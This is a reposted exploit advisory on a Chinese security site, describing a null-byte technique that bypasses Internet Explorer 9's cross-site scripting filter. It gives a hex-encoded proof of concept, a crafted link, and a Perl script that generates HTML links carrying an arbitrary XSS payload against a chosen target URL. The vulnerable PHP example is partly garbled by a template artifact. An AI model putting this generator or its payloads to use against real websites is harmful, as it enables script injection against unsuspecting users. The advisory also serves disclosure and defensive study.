首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer 9 XSS Filter Bypass
来源:pereira@secbiz.de 作者:Pereira 发布时间:2012-10-19  
#################################################
Internet Explorer 9 XSS Filter Bypass
#################################################
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
Vendor information:
"Internet Explorer (formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly 
abbreviated IE or MSIE)
is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft 
Windows line of operating
systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 
that year. Later versions
were available as free downloads, or in service packs, and included in the OEM service releases of 
Windows 95 and later versions of Windows.."
Vendor URI: http://www.microsoft.com
#################################################
Issue: Cross Site Scripting Filter Bypass
-------------------------------------
Description:
The Internet Explorer 9 offers a feature to eliminate suspicious pattern passed to the website by a 
parameter.
For example, we have the following script:
-------------------------------------
<?php
echo 
___FCKpd___0
GET['a']; ?> ------------------------------------- Let's call it "blah.php". Now we access the blah.php by using Internet Explorer 9 and try to execute a malicious string: http://localhost/ieb/blah.php?a=<script>alert(1)</script> After this, we receive the message "Internet Explorer has modified this page to help prevent cross- site scripting". The JavaScript won't be executed. ------------------------------------- Proof Of Concept: This trick may be known to some of you. Internet Explorer allows stripping tags by inserting nullbytes. For example, the following string will be executed: 3C 73 00 63 72 69 70 74 3E 61 6C 65 72 74 28 31 29 3C 2F 73 00 63 72 69 70 74 3E Which is actually "<s[NULL]cript>alert(1)</s[NULL]cript>". However, we won't be able to insert the nullbytes directly in the URI. The following example won't work: http://localhost/ieb/blah.php?a=<s%00cript>alert(1)</s%00cript> But there is still another possibility. Grab a hex editor and create a file looking like the example given below: <a href='http://localhost/ieb/blah.php?a=<s[NULL]cript>alert(1)</s[NULL]cript>'>Clickme</a> If you open the file and click the provided link, the script will be executed. ------------------------------------- Exploit (for the lazy folks): ------------------------------------- #!/usr/bin/perl use strict; use warnings; # Internet Explorer 9 XSS Filter Bypass Generator # Credit: Jean Pascal Pereira <pereira[at]secbiz.de> # http://0xffe4.org my $target = shift || die("No target defined"); my $payload = shift || die("No payload defined"); my $lnk_txt = shift || "Click me :)"; open(OUT, ">:raw", "out.html"); print OUT "\x3C\x61\x20\x68\x72\x65\x66\x3D\x27"; print OUT $target; print OUT "\x3C\x73\x00\x63\x72\x69\x70\x74\x3E"; print OUT $payload; print OUT "\x3C\x2F\x73\x00\x63\x72\x69\x70\x74\x3E\x27\x3E"; print OUT $lnk_txt; print OUT "\x3C\x2F\x61\x3E"; close(OUT); ------------------------------------- Example usage is: iefilter.pl http://www.example.com?var= alert(1) ------------------------------------- Note: Exploitation via <a href="ja[NULL]vascript:... links is also possible. ------------------------------------- Solution: Currently, no solution is available for this issue. ------------------------------------- ################################################# < http://0xffe4.org >

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·JPEGsnoop 1.5.2 <= WriteAV Arb
·Oracle Database Authentication
·NCMedia Sound Editor Pro v7.5.
·BestPlay v4.1 (.mp3) Crash PoC
·ManageEngine Security Manager
·ManageEngine Security Manager
·Samsung Kies 2.3.2.12054_20 Mu
·ManageEngine Security Manager
·Ezhometech EzServer 7.0 Remote
·Internet Explorer 9 XSS Filter
·Debian OpenSSL Predictable PRN
·RealPlayer 15.0.6.14 (.3GP) Ar
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved